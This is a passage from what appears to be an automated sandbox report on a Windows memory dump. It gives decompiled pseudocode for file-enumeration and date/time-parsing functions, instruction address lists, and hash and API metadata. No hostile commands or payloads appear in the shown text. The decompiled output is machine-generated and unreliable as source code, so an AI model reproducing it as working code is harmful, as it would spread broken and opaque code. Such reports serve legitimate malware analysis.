															 *(_t416 + 0x1c) = _t290;
														}
														_t363 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t363 =  &_v1096;
														}
														_t266 = E002A5400(_t363, _v568,  *_t416, _t421[1]);
														__eflags = _t266;
														if(_t266 == 0) {
															_t267 = _v576;
															__eflags = _t267;
															if(_t267 == 0) {
																_t267 =  &_v1096;
															}
															_push(_t267);
															E002B25D9(L"%s\r\n");
														} else {
															_push(0);
															_push(_t266);
															E002AC108(0);
														}
														_t366 = _v576;
														__eflags = _v576;
														if(_v576 == 0) {
															_t366 =  &_v1096;
														}
														_t269 = E002AAD44(_t366);
														__eflags = _t269;
														if(_t269 != 0) {
															_t401 = _v1112;
															__eflags = _v1112;
															if(_v1112 == 0) {
																_t401 =  &_v1632;
															}
															_t367 = _v576;
															__eflags = _v576;
															if(_v576 == 0) {
																_t367 =  &_v1096;
															}
															_t270 = E002C8F66(_t367, _t401);
															__eflags = _t270;
															if(_t270 == 0) {
																_t368 = _v576;
																__eflags = _t368;
																if(_t368 == 0) {
																	_t368 =  &_v1096;
																}
																_t422 = E002A5DB5(_t368, 0, _t368, _t368);
																__eflags = _t422 - 0xffffffff;
																if(_t422 == 0xffffffff) {
																	E002ACD27(_v1664);
																	_t357 = _v1672;
																	goto L134;
																}
																_t273 = E002B0178(_t271);
																__eflags = _t273;
																if(_t273 == 0) {
																	L120:
																	_t371 = _v1652;
																} else {
																	_t371 = 0x80;
																	_v1652 = 0x80;
																}
																__eflags =  *0x2cd5cc;
																if( *0x2cd5cc == 0) {
																	_t274 = _v1112;
																	__eflags = _t274;
																	if(_t274 == 0) {
																		_t274 =  &_v1632;
																	}
																	_t276 = E002A5712(_t422, _v1660, _t371,  &_v1656, _t416, _v1672, _t274);
																	__eflags = _t276;
																	if(_t276 != 0) {
																		_t279 = _v1112;
																		__eflags = _t279;
																		if(_t279 == 0) {
																			_t279 =  &_v1632;
																		}
																		_t280 = E002C916C(_v1672, _v1660, _v1656, _t279, _t422);
																		__eflags =  *0x2cd560;
																		if( *0x2cd560 != 0) {
																			_t281 = E002B0178(_t280);
																			__eflags = _t281;
																			if(_t281 == 0) {
																				_t405 = _v1112;
																				__eflags = _v1112;
																				if(__eflags == 0) {
																					_t405 =  &_v1632;
																				}
																				_t282 = E002C84FE(_t281, _t405, __eflags, _v1656, _v1660, _v1644);
																				__eflags = _t282 - _t316;
																				if(_t282 == _t316) {
																					E002ACD27(_v1664);
																					E002ADB92(_t422);
																					_t352 = _v1668;
																					goto L129;
																				}
																				_v1672 = _v1668;
																			}
																		}
																		goto L120;
																	}
																}
																__eflags = 0;
																 *0x2cd5cc = 0;
																E002ADB92(_t422);
																_t421 = _v1648;
															} else {
																_push(0);
																_push(0x2340);
																E002AC108(_t367);
															}
														}
														_t416 =  *(_t416 + 0x20);
														__eflags = _t416;
													} while (_t416 != 0);
													_t263 = 0;
													__eflags = 0;
												}
												_t413 = _v1672;
												E002A56AE(_t421, _v1640, _v1672, _t263);
											}
											_t391 = _t421[6];
											_t242 = E002B6A1C(E002B6A00, _t421[6], 0x21, _v1664);
											__eflags = _t242;
											if(_t242 != 0) {
												continue;
											} else {
												E002ACD27(_v1664);
												__imp__??_V@YAXPAX@Z(_v576);
												__imp__??_V@YAXPAX@Z(_v40);
												__imp__??_V@YAXPAX@Z(_v1112);
												_t218 = 0;
											}
										}
									}
									goto L142;
								}
								_t214 = E002ACD27(_v1664);
							}
							goto L141;
						}
					}
				}
				L142:
				_pop(_t414);
				_pop(_t420);
				_pop(_t317);
				return E002B6FD0(_t218, _t317, _v20 ^ _t431, _t391, _t414, _t420);
			}




































































































                                              0x002c85e9
                                              0x002c85e9
                                              0x002c85ec
                                              0x002c85f0
                                              0x002c85f2
                                              0x002c85f4
                                              0x002c85f5
                                              0x002c85fb
                                              0x002c85fb
                                              0x002c85ff
                                              0x002c8607
                                              0x002c8617
                                              0x002c8624
                                              0x002c8629
                                              0x002c8629
                                              0x002c8633
                                              0x002c8649
                                              0x002c8649
                                              0x002c864e
                                              0x002c8654
                                              0x00000000
                                              0x00000000
                                              0x002c8640
                                              0x002c8644
                                              0x002c8644
                                              0x002c865d
                                              0x002c8663
                                              0x002c866c
                                              0x002c8672
                                              0x002c8679
                                              0x002c8681
                                              0x002c8682
                                              0x002c8688
                                              0x002c868d
                                              0x002c868f
                                              0x002c869e
                                              0x002c86a3
                                              0x002c86a4
                                              0x002c86ac
                                              0x002c86af
                                              0x002c86b6
                                              0x002c86be
                                              0x002c86cc
                                              0x002c86d3
                                              0x002c86e4
                                              0x002c86ec
                                              0x002c86fa
                                              0x002c8701
                                              0x002c8712
                                              0x002c871d
                                              0x002c873d
                                              0x002c8e1a
                                              0x002c8e36
                                              0x002c8e3b
                                              0x002c879b
                                              0x002c87a8
                                              0x002c87ad
                                              0x002c87b3
                                              0x00000000
                                              0x002c87b9
                                              0x002c87c0
                                              0x002c87f3
                                              0x00000000
                                              0x002c87c2
                                              0x002c87ce
                                              0x002c87d2
                                              0x002c87d7
                                              0x002c87dd
                                              0x002c87eb
                                              0x002c87ed
                                              0x002c87f7
                                              0x002c87f7
                                              0x002c87f7
                                              0x002c87fb
                                              0x002c87fe
                                              0x002c8802
                                              0x002c8804
                                              0x002c880b
                                              0x00000000
                                              0x00000000
                                              0x002c880d
                                              0x002c8810
                                              0x002c8816
                                              0x00000000
                                              0x002c8818
                                              0x002c8818
                                              0x00000000
                                              0x002c8818
                                              0x00000000
                                              0x002c8816
                                              0x002c881f
                                              0x002c8829
                                              0x002c8833
                                              0x002c8838
                                              0x002c8838
                                              0x002c883f
                                              0x002c8842
                                              0x002c8844
                                              0x002c8849
                                              0x002c8849
                                              0x002c884c
                                              0x002c884c
                                              0x002c884f
                                              0x002c8856
                                              0x00000000
                                              0x00000000
                                              0x002c885c
                                              0x002c8863
                                              0x002c8865
                                              0x002c8867
                                              0x002c8867
                                              0x002c8877
                                              0x002c887c
                                              0x002c887e
                                              0x00000000
                                              0x002c8884
                                              0x002c8884
                                              0x002c888c
                                              0x002c8891
                                              0x002c889a
                                              0x002c889c
                                              0x002c889e
                                              0x002c889e
                                              0x002c88a2
                                              0x002c88b2
                                              0x002c88b7
                                              0x002c88b9
                                              0x00000000
                                              0x002c88bf
                                              0x002c88bf
                                              0x002c88c6
                                              0x002c88c8
                                              0x002c88ca
                                              0x002c88cc
                                              0x002c88cc
                                              0x002c88d2
                                              0x002c88d5
                                              0x002c88db
                                              0x002c88dd
                                              0x002c88df
                                              0x002c88df
                                              0x002c88e6
                                              0x002c88eb
                                              0x002c88ee
                                              0x002c88f0
                                              0x002c8921
                                              0x002c8923
                                              0x002c8926
                                              0x002c8e0a
                                              0x002c8de9
                                              0x002c8deb
                                              0x002c8dec
                                              0x002c8da2
                                              0x002c8da4
                                              0x002c8da6
                                              0x002c8dab
                                              0x002c8daf
                                              0x002c8db6
                                              0x002c8dbb
                                              0x002c8d9d
                                              0x002c8d9d
                                              0x00000000
                                              0x002c8d9d
                                              0x002c892e
                                              0x002c8933
                                              0x002c8935
                                              0x002c8942
                                              0x002c8937
                                              0x002c8937
                                              0x002c893c
                                              0x002c893c
                                              0x002c8946
                                              0x002c894d
                                              0x002c894f
                                              0x002c8951
                                              0x002c8951
                                              0x002c895b
                                              0x002c8968
                                              0x002c896d
                                              0x002c8974
                                              0x002c8978
                                              0x002c8e00
                                              0x002c8df7
                                              0x002c8df7
                                              0x002c8dfc
                                              0x002c8de4
                                              0x002c8de4
                                              0x00000000
                                              0x002c8de4
                                              0x002c897e
                                              0x002c8985
                                              0x002c8987
                                              0x002c8989
                                              0x002c8989
                                              0x002c898e
                                              0x002c8994
                                              0x002c899b
                                              0x002c899d
                                              0x002c89d2
                                              0x002c89d4
                                              0x002c89d6
                                              0x002c89d6
                                              0x002c89e3
                                              0x002c89e5
                                              0x002c89e9
                                              0x002c899f
                                              0x002c899f
                                              0x002c89a1
                                              0x002c89a3
                                              0x002c89a3
                                              0x002c89a7
                                              0x002c89ac
                                              0x002c89b0
                                              0x002c89b4
                                              0x002c89b7
                                              0x002c8df3
                                              0x002c8df3
                                              0x00000000
                                              0x002c8df3
                                              0x002c89be
                                              0x002c89c6
                                              0x002c89cc
                                              0x002c89cc
                                              0x002c89ed
                                              0x002c89f0
                                              0x00000000
                                              0x00000000
                                              0x002c89f6
                                              0x002c89fd
                                              0x002c8a85
                                              0x002c8a85
                                              0x002c8a8f
                                              0x002c8a8f
                                              0x002c8a91
                                              0x00000000
                                              0x00000000
                                              0x002c8a97
                                              0x002c8a9e
                                              0x002c8aa0
                                              0x002c8aa2
                                              0x002c8aa2
                                              0x002c8ab0
                                              0x002c8ab5
                                              0x002c8abc
                                              0x002c8ac0
                                              0x002c8ac2
                                              0x002c8ac7
                                              0x002c8ac9
                                              0x002c8b01
                                              0x002c8acb
                                              0x002c8acb
                                              0x002c8ad2
                                              0x002c8ad4
                                              0x002c8ad6
                                              0x002c8ad6
                                              0x002c8aea
                                              0x002c8aef
                                              0x002c8af1
                                              0x00000000
                                              0x00000000
                                              0x002c8af7
                                              0x002c8afb
                                              0x002c8afb
                                              0x002c8ac9
                                              0x002c8b05
                                              0x002c8b0c
                                              0x002c8b0e
                                              0x002c8b10
                                              0x002c8b10
                                              0x002c8b26
                                              0x002c8b2b
                                              0x002c8b32
                                              0x002c8a8b
                                              0x00000000
                                              0x002c8a8b
                                              0x00000000
                                              0x002c8b32
                                              0x002c8a03
                                              0x002c8a03
                                              0x002c8a08
                                              0x002c8a0a
                                              0x002c8a11
                                              0x002c8a13
                                              0x002c8a15
                                              0x002c8a15
                                              0x002c8a23
                                              0x002c8a28
                                              0x002c8a2f
                                              0x002c8a33
                                              0x002c8a35
                                              0x002c8a3a
                                              0x002c8a3c
                                              0x002c8a74
                                              0x002c8a3e
                                              0x002c8a3e
                                              0x002c8a45
                                              0x002c8a47
                                              0x002c8a49
                                              0x002c8a49
                                              0x002c8a5d
                                              0x002c8a62
                                              0x002c8a64
                                              0x002c8d8d
                                              0x002c8d94
                                              0x002c8d99
                                              0x00000000
                                              0x002c8d99
                                              0x002c8a6a
                                              0x002c8a6e
                                              0x002c8a6e
                                              0x002c8a3c
                                              0x002c8a33
                                              0x002c8a78
                                              0x002c8a7f
                                              0x00000000
                                              0x00000000
                                              0x002c8a7f
                                              0x002c8b38
                                              0x002c8b38
                                              0x002c8b3c
                                              0x002c8b41
                                              0x002c8b46
                                              0x002c88f2
                                              0x002c88fc
                                              0x002c8901
                                              0x002c8905
                                              0x002c8905
                                              0x002c8b4a
                                              0x002c8b4d
                                              0x002c8b4f
                                              0x002c8b54
                                              0x002c8b56
                                              0x002c8b5c
                                              0x002c8b5c
                                              0x002c8b5f
                                              0x002c8b61
                                              0x002c8b66
                                              0x002c8b66
                                              0x002c8b69
                                              0x002c8b69
                                              0x002c8b6c
                                              0x002c8b73
                                              0x002c8b75
                                              0x002c8b77
                                              0x002c8b77
                                              0x002c8b8a
                                              0x002c8b8f
                                              0x002c8b91
                                              0x002c8b9e
                                              0x002c8ba5
                                              0x002c8ba7
                                              0x002c8ba9
                                              0x002c8ba9
                                              0x002c8bb0
                                              0x002c8bb6
                                              0x002c8b93
                                              0x002c8b95
                                              0x002c8b96
                                              0x002c8b97
                                              0x002c8b97
                                              0x002c8bbd
                                              0x002c8bc4
                                              0x002c8bc6
                                              0x002c8bc8
                                              0x002c8bc8
                                              0x002c8bcf
                                              0x002c8bd4
                                              0x002c8bd6
                                              0x002c8bdc
                                              0x002c8be3
                                              0x002c8be5
                                              0x002c8be7
                                              0x002c8be7
                                              0x002c8beb
                                              0x002c8bf2
                                              0x002c8bf4
                                              0x002c8bf6
                                              0x002c8bf6
                                              0x002c8bfd
                                              0x002c8c02
                                              0x002c8c04
                                              0x002c8c1a
                                              0x002c8c21
                                              0x002c8c23
                                              0x002c8c25
                                              0x002c8c25
                                              0x002c8c35
                                              0x002c8c37
                                              0x002c8c3a
                                              0x002c8ddb
                                              0x002c8de0
                                              0x00000000
                                              0x002c8de0
                                              0x002c8c42
                                              0x002c8c47
                                              0x002c8c49
                                              0x002c8cf3
                                              0x002c8cf3
                                              0x002c8c4f
                                              0x002c8c4f
                                              0x002c8c54
                                              0x002c8c54
                                              0x002c8cf7
                                              0x002c8cfe
                                              0x002c8c5d
                                              0x002c8c64
                                              0x002c8c66
                                              0x002c8c68
                                              0x002c8c68
                                              0x002c8c7e
                                              0x002c8c83
                                              0x002c8c85
                                              0x002c8c87
                                              0x002c8c8e
                                              0x002c8c90
                                              0x002c8c92
                                              0x002c8c92
                                              0x002c8ca4
                                              0x002c8ca9
                                              0x002c8cb0
                                              0x002c8cb6
                                              0x002c8cbb
                                              0x002c8cbd
                                              0x002c8cbf
                                              0x002c8cc6
                                              0x002c8cc8
                                              0x002c8cca
                                              0x002c8cca
                                              0x002c8cde
                                              0x002c8ce3
                                              0x002c8ce5
                                              0x002c8dc5
                                              0x002c8dcc
                                              0x002c8dd1
                                              0x00000000
                                              0x002c8dd1
                                              0x002c8cef
                                              0x002c8cef
                                              0x002c8cbd
                                              0x00000000
                                              0x002c8cb0
                                              0x002c8c85
                                              0x002c8d04
                                              0x002c8d08
                                              0x002c8d0d
                                              0x002c8d12
                                              0x002c8c06
                                              0x002c8c08
                                              0x002c8c09
                                              0x002c8c0e
                                              0x002c8c14
                                              0x002c8c04
                                              0x002c8d16
                                              0x002c8d19
                                              0x002c8d19
                                              0x002c8d21
                                              0x002c8d21
                                              0x002c8d21
                                              0x002c8d23
                                              0x002c8d2f
                                              0x002c8d2f
                                              0x002c8d38
                                              0x002c8d42
                                              0x002c8d47
                                              0x002c8d49
                                              0x00000000
                                              0x002c8d4f
                                              0x002c8d53
                                              0x002c8d5f
                                              0x002c8d6d
                                              0x002c8d7b
                                              0x002c8d82
                                              0x002c8d82
                                              0x002c8d49
                                              0x002c88b9
                                              0x00000000
                                              0x002c887e
                                              0x002c8e15
                                              0x002c8e15
                                              0x00000000
                                              0x002c87dd
                                              0x002c87c0
                                              0x002c87b3
                                              0x002c8e3d
                                              0x002c8e44
                                              0x002c8e45
                                              0x002c8e46
                                              0x002c8e51

                                              APIs
                                              • longjmp.MSVCRT(002DB8F8,00000001,00000000,002C8DAB,?,?,?,?,00000000,?,00000021,00000000,?,?,?,00000000), ref: 002C865D
                                              • memset.MSVCRT ref: 002C86B6
                                              • memset.MSVCRT ref: 002C86E4
                                              • memset.MSVCRT ref: 002C8712
                                                • Part of subcall function 002ACD27: FindClose.API-MS-WIN-CORE-FILE-L1-1-0(?,00000000,002C9362,00000000,00000000,?,002B9814,00000000), ref: 002ACD55
                                                • Part of subcall function 002B0C70: ??_V@YAXPAX@Z.MSVCRT ref: 002B0CBA
                                                • Part of subcall function 002B0C70: memset.MSVCRT ref: 002B0CDD
                                                • Part of subcall function 002A585F: VirtualAlloc.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,0000FE00,00001000,00000004,00000000,?,00000001,?,002C87AD,?,00000000,-00000105,-00000105,-00000105), ref: 002A5875
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: memset$AllocCloseFindVirtuallongjmp
                                              • String ID: %9d
                                              • API String ID: 973120493-2241623522
                                              • Opcode ID: fc155359fea04e39754a47b8b59662f8a57486bf119357ad3de4952d1cbc3045
                                              • Instruction ID: f0f1c725fb6ba43c25f110a94457d24c71d50b09d9ad0fc807d6918cda990eab
                                              • Opcode Fuzzy Hash: fc155359fea04e39754a47b8b59662f8a57486bf119357ad3de4952d1cbc3045
                                              • Instruction Fuzzy Hash: 6951B3B19283819BD324DB24CC85AAB7BD9EB84354F000A3EF589D3281EF74D964CB16
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C3FD4, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 147COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 91%
                                              			E002C3FD4(signed short* __ecx, wchar_t* __edx, char _a4) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				signed int _v24;
				wchar_t* _v28;
				void* _v32;
				void* _v36;
				long _v40;
				wchar_t* _v44;
				signed short* _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t42;
				intOrPtr _t45;
				intOrPtr _t46;
				long _t50;
				long _t51;
				signed int _t54;
				signed short _t60;
				void* _t61;
				signed short _t64;
				long _t65;
				signed short* _t69;
				long _t70;
				wchar_t* _t72;
				signed short* _t73;
				wchar_t* _t75;
				long _t77;
				signed int _t81;
				signed int _t82;
				signed int _t90;
				signed int _t91;
				signed int _t92;
				signed int _t93;
				void* _t94;

				_t42 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t42 ^ _t93;
				_t2 =  &_a4; // 0x2c3f3c
				_v44 =  *_t2;
				_t72 = __edx;
				_t45 =  *0x2cd540; // 0x0
				_v48 = __ecx;
				_t92 = 2;
				_t46 = _t45;
				if(_t46 == 0) {
					_v32 =  &_v16;
					_v36 =  &_v20;
					goto L5;
				} else {
					if(_t46 == _t92) {
						_t9 =  &_v12; // 0x2c3f3c
						_t91 = 0;
						_v32 = _t9;
						_v36 =  &_v16;
					} else {
						_v32 =  &_v20;
						_v36 =  &_v16;
						L5:
						_t91 = _t92;
					}
				}
				_v24 = 0;
				do {
					_t50 =  *_t72 & 0x0000ffff;
					_v28 = _t72;
					if(_t50 == 0) {
						L11:
						_t51 = wcstol(_t72, 0, 0xa);
						_t90 = _v24;
						_t94 = _t94 + 0xc;
						_t75 = _v28;
						_v40 = _t51;
						 *(_t93 + _t90 * 4 - 0x10) = _t51;
						_t54 = _t75 - _t72 >> 1;
						if(_t90 != _t91) {
							if(_t54 == 1 || _t54 == _t92) {
								goto L19;
							} else {
								goto L16;
							}
						} else {
							if(_t54 == _t92 || _t54 == 4) {
								if(_t54 != 4 || _v40 >= 0x640) {
									L19:
									_t73 = _t75 + 2;
									if(_t90 >= _t92) {
										goto L23;
									} else {
										_t65 =  *_t73 & 0x0000ffff;
										if(_t65 == 0 || wcschr(_v44, _t65) == 0) {
											goto L16;
										} else {
											_t90 = _v24;
											goto L23;
										}
									}
								} else {
									goto L16;
								}
							} else {
								goto L16;
							}
						}
					} else {
						_t77 = _t50;
						while(iswdigit(_t77) != 0) {
							_t69 = _v28 + _t92;
							_v28 = _t69;
							_t70 =  *_t69 & 0x0000ffff;
							_t77 = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								goto L11;
							}
							goto L34;
						}
						L16:
						_t61 = 0;
					}
					L34:
					return E002B6FD0(_t61, _t73, _v8 ^ _t93, _t90, _t91, _t92);
					L23:
					_v24 = _t90;
					_t72 = E002AD7E6(_t73);
				} while (_v24 < 3);
				_t73 = _v48;
				_t73[3] =  *_v32;
				_t73[1] =  *_v36;
				_t60 =  *(_t93 + _t91 * 4 - 0x10);
				if(_t60 < 0) {
					goto L16;
				} else {
					_t81 = _t60 & 0x0000ffff;
					if(_t60 > 0x4f) {
						_t92 = _t81;
						_t90 = _t81;
						if(_t60 < 0x50 || _t60 > 0x63) {
							_t82 = _t92;
							if(_t60 < 0x64) {
								goto L33;
							} else {
								_t82 = _t90;
								if(_t60 <= 0x7bb) {
									goto L16;
								} else {
									goto L33;
								}
							}
						} else {
							_t64 = _t60 + 0x76c;
							goto L30;
						}
					} else {
						_t64 = _t60 + 0x7d0;
						L30:
						_t82 = _t64 & 0x0000ffff;
						L33:
						 *_t73 = _t82;
						_t61 = 1;
					}
				}
				goto L34;
			}








































                                              0x002c3fdc
                                              0x002c3fe3
                                              0x002c3fe6
                                              0x002c3fec
                                              0x002c3fef
                                              0x002c3ff1
                                              0x002c3ff6
                                              0x002c3ffb
                                              0x002c3ffc
                                              0x002c3fff
                                              0x002c4026
                                              0x002c402c
                                              0x00000000
                                              0x002c4001
                                              0x002c4003
                                              0x002c4013
                                              0x002c4016
                                              0x002c4018
                                              0x002c401e
                                              0x002c4005
                                              0x002c4008
                                              0x002c400e
                                              0x002c402f
                                              0x002c402f
                                              0x002c402f
                                              0x002c4003
                                              0x002c4033
                                              0x002c4036
                                              0x002c4036
                                              0x002c4039
                                              0x002c403f
                                              0x002c4061
                                              0x002c4066
                                              0x002c406c
                                              0x002c406f
                                              0x002c4072
                                              0x002c4075
                                              0x002c4078
                                              0x002c4080
                                              0x002c4084
                                              0x002c40a7
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c4086
                                              0x002c4088
                                              0x002c4092
                                              0x002c40ad
                                              0x002c40ad
                                              0x002c40b2
                                              0x00000000
                                              0x002c40b4
                                              0x002c40b4
                                              0x002c40ba
                                              0x00000000
                                              0x002c40cc
                                              0x002c40cc
                                              0x00000000
                                              0x002c40cc
                                              0x002c40ba
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c4088
                                              0x002c4041
                                              0x002c4041
                                              0x002c4043
                                              0x002c4052
                                              0x002c4054
                                              0x002c4057
                                              0x002c405a
                                              0x002c405f
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c405f
                                              0x002c409d
                                              0x002c409d
                                              0x002c409d
                                              0x002c4146
                                              0x002c4156
                                              0x002c40cf
                                              0x002c40d2
                                              0x002c40de
                                              0x002c40de
                                              0x002c40e9
                                              0x002c40ef
                                              0x002c40f9
                                              0x002c40fd
                                              0x002c4103
                                              0x00000000
                                              0x002c4105
                                              0x002c4105
                                              0x002c410b
                                              0x002c4114
                                              0x002c4116
                                              0x002c411b
                                              0x002c412c
                                              0x002c4131
                                              0x00000000
                                              0x002c4133
                                              0x002c4133
                                              0x002c413a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c413a
                                              0x002c4122
                                              0x002c4122
                                              0x00000000
                                              0x002c4122
                                              0x002c410d
                                              0x002c410d
                                              0x002c4127
                                              0x002c4127
                                              0x002c4140
                                              0x002c4142
                                              0x002c4145
                                              0x002c4145
                                              0x002c410b
                                              0x00000000

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
                                              • Associated: 00000004.00000002.677078168.00000000002E9000.00000040.00000001.sdmp Download File
                                              • Associated: 00000004.00000002.677094920.00000000002ED000.00000040.00000001.sdmp Download File
                                              Similarity
                                              • API ID: iswdigitwcschrwcstol
                                              • String ID: <?,:$<?,:
                                              • API String ID: 2478187640-2175520758
                                              • Opcode ID: 8e3f337308cac944e26fadf9927eee34789ee3459582fcccff333a6049455be4
                                              • Instruction ID: c279030734a46cbd44f6f348cb47450e3461bddc32ef8334ee49389f9191e382
                                              • Opcode Fuzzy Hash: 8e3f337308cac944e26fadf9927eee34789ee3459582fcccff333a6049455be4
                                              • Instruction Fuzzy Hash: 5C519074A6021A8BCF18DFA8D894BBEB7B0EF58705F14452ED915E7280E7349950CB61
                                              Uniqueness

                                              Uniqueness Score: -1.00%

                                              Function 002C4159, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 146COMMON
                                              Download Yara Rule
                                              C-Code - Quality: 89%
                                              			E002C4159(signed int __ecx, wchar_t* __edx, char _a4) {
				signed int _v8;
				char _v20;
				void* _v24;
				intOrPtr _v28;
				signed int _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t26;
				long _t29;
				void* _t30;
				void* _t32;
				int _t36;
				signed int _t39;
				signed int _t40;
				signed int _t41;
				signed short _t42;
				long _t45;
				long _t46;
				signed int _t48;
				wchar_t* _t52;
				int _t55;
				signed int _t59;
				void* _t64;
				long* _t66;
				intOrPtr _t69;
				long* _t73;
				void* _t77;
				void* _t78;
				void* _t79;
				wchar_t* _t81;
				signed int _t83;
				signed int _t84;
				void* _t85;

				_t26 =  *0x2cd0b4; // 0x40f69e4c
				_v8 = _t26 ^ _t84;
				_t2 =  &_a4; // 0x2c3f43
				_v32 = __ecx;
				_v28 =  *_t2;
				_t52 = __edx;
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_t55 = 0;
				_v24 = __ecx + 8;
				_t77 = 0;
				while(1) {
					_t81 = _t52;
					_t8 =  &(_t81[0]); // 0x2
					_t73 = _t8;
					do {
						_t29 =  *_t81;
						_t81 =  &(_t81[0]);
					} while (_t29 != _t55);
					_t83 = _t81 - _t73 >> 1;
					if(_t83 > 2 || iswdigit( *_t52 & 0x0000ffff) == 0) {
						L16:
						_t74 =  *_t52 & 0x0000ffff;
						if(( *_t52 & 0x0000ffff) == 0) {
							goto L31;
						} else {
							if(E002AD7D4( &_v20, _t74) == 0) {
								goto L11;
							} else {
								goto L18;
							}
						}
					} else {
						_t45 = _t52[0] & 0x0000ffff;
						if(_t45 == 0 || iswdigit(_t45) != 0) {
							_t46 = wcstol(_t52, 0, 0xa);
							_t66 = _v24;
							_t52 = _t52 + _t83 * 2 + 2;
							_t85 = _t85 + 0xc;
							 *_t66 = _t46;
							_t74 =  *_t52 & 0x0000ffff;
							_v24 =  &(_t66[0]);
							if(( *_t52 & 0x0000ffff) == 0) {
								L31:
								_t77 = _t77 + 1;
								_t30 = 4;
								if(_t77 < _t30) {
									_t78 = _v24;
									_t59 = _t30 - _t77 >> 1;
									_t36 = memset(_t78, 0, _t59 << 2);
									_t79 = _t78 + _t59;
									asm("adc ecx, ecx");
									memset(_t79, _t36, 0);
									_t77 = _t79;
								}
								_t32 = 1;
							} else {
								if(E002AD7D4( &_v20, _t74) != 0) {
									L18:
									_t39 =  *_t52 & 0x0000ffff;
									if(_t39 == 0x70 || _t39 == 0x50) {
										_t64 = 1;
									} else {
										_t64 = 0;
									}
									_t40 = _t52[1] & 0x0000ffff;
									if(_t40 == 0 || _t40 == 0x6d || _t40 == 0x4d) {
										_t74 = _v32;
										_t41 =  *(_t74 + 8) & 0x0000ffff;
										if(_t64 == 0) {
											if(_t41 == 0xc) {
												_t42 = 0;
												goto L30;
											}
										} else {
											if(_t41 != 0xc) {
												_t42 = _t41 + 0xc;
												L30:
												 *(_t74 + 8) = _t42;
											}
										}
										goto L31;
									} else {
										goto L11;
									}
								} else {
									_t48 =  *_t52 & 0x0000ffff;
									_t69 = _v28;
									if(_t77 >= 2) {
										if(_t48 ==  *((intOrPtr*)(_t69 + 2)) || _t48 ==  *((intOrPtr*)(_t69 + 6))) {
											goto L14;
										} else {
											goto L11;
										}
									} else {
										_t74 = _t48;
										if(E002AD7D4(_t69, _t48) != 0) {
											L14:
											_t77 = _t77 + 1;
											_t52 = E002AD7E6(_t52);
											if(_t77 >= 4) {
												goto L16;
											} else {
												_t55 = 0;
												continue;
											}
										} else {
											L11:
											_t32 = 0;
										}
									}
								}
							}
						} else {
							goto L16;
						}
					}
					return E002B6FD0(_t32, _t52, _v8 ^ _t84, _t74, _t77, _t83);
				}
			}





































                                              0x002c4161
                                              0x002c4168
                                              0x002c416b
                                              0x002c4176
                                              0x002c417c
                                              0x002c417f
                                              0x002c4181
                                              0x002c4182
                                              0x002c4183
                                              0x002c4188
                                              0x002c418a
                                              0x002c418d
                                              0x002c418f
                                              0x002c418f
                                              0x002c4191
                                              0x002c4191
                                              0x002c4194
                                              0x002c4194
                                              0x002c4197
                                              0x002c419a
                                              0x002c41a1
                                              0x002c41a6
                                              0x002c424b
                                              0x002c424b
                                              0x002c4251
                                              0x00000000
                                              0x002c4253
                                              0x002c425d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c425d
                                              0x002c41bf
                                              0x002c41bf
                                              0x002c41c6
                                              0x002c41d9
                                              0x002c41df
                                              0x002c41e5
                                              0x002c41e8
                                              0x002c41eb
                                              0x002c41f1
                                              0x002c41f4
                                              0x002c41fa
                                              0x002c42a6
                                              0x002c42a8
                                              0x002c42a9
                                              0x002c42ac
                                              0x002c42b0
                                              0x002c42b7
                                              0x002c42b9
                                              0x002c42b9
                                              0x002c42bb
                                              0x002c42bd
                                              0x002c42bd
                                              0x002c42bd
                                              0x002c42c2
                                              0x002c4200
                                              0x002c420a
                                              0x002c425f
                                              0x002c425f
                                              0x002c4265
                                              0x002c4272
                                              0x002c426c
                                              0x002c426c
                                              0x002c426c
                                              0x002c4273
                                              0x002c427a
                                              0x002c4286
                                              0x002c4289
                                              0x002c428f
                                              0x002c429e
                                              0x002c42a0
                                              0x00000000
                                              0x002c42a0
                                              0x002c4291
                                              0x002c4294
                                              0x002c4296
                                              0x002c42a2
                                              0x002c42a2
                                              0x002c42a2
                                              0x002c4294
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c420c
                                              0x002c420c
                                              0x002c420f
                                              0x002c4215
                                              0x002c422d
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c4217
                                              0x002c4217
                                              0x002c4220
                                              0x002c4235
                                              0x002c4237
                                              0x002c423d
                                              0x002c4242
                                              0x00000000
                                              0x002c4244
                                              0x002c4244
                                              0x00000000
                                              0x002c4244
                                              0x002c4222
                                              0x002c4222
                                              0x002c4222
                                              0x002c4222
                                              0x002c4220
                                              0x002c4215
                                              0x002c420a
                                              0x00000000
                                              0x00000000
                                              0x00000000
                                              0x002c41c6
                                              0x002c42d3
                                              0x002c42d3

                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000004.00000002.676959985.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: true
